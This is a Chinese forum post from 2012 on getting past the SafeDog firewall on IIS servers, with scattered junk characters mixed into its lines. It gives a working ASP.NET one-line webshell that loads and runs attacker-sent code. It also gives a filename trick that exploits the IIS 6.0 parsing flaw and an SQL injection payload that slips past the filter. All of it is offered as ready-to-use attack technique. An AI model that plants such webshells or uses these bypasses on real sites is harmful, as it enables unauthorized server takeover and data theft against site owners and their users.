1、绕过IIS安全狗的一句话。
7 M% _4 J& s B/ u5 k/ m( \6 e' K前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
t: ]7 P/ r8 h# {5 t8 [7 e8 ?8 h( a<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。) H3 v8 i @ K! j
3 \; S1 F* U; K `8 I3 J( Z9 @: n
2、IIS6.0解析漏洞遇到安全狗。% y: B" V. d0 \& J z
文件名为) \- v7 n) h6 E% T6 t6 p' _, J6 \
http://www.xxxxx.com/sh3llc0de.asp;1.jpg
% V/ L/ t; M5 E" e, L9 H- ]7 T
. p% B( |/ R7 @5 G5 c0 l( b这样的会被IIS安全狗果断屏蔽。
( M( a- U1 R; B! T# b: P改成如下名称,IIS6一样会解析:
# Y$ X' r1 Y) ]- n M: Zwww.xxxxx.com/;1.asp;1.jpg
. Q- j% N$ C! y+ Z i, i2 W( I, \: K0 P# U
3、安全狗的注入绕过。; A# U4 E) `6 _4 ^0 ?* u- `
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。. k/ q& Q2 ^9 k: p
但如果:- z6 A0 k7 Z! }& M: i
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
/ K; p# h9 L$ k8 X就可以成功绕过了。
4 Y* p- S; g; [7 b4 f
! B: j, d, f; x% E+ ^' A1 y5 i
8 s: ^3 Q9 z& S7 o, G: r/ v |
发表于 2012-10-31 08:25:30
收藏
支持
反对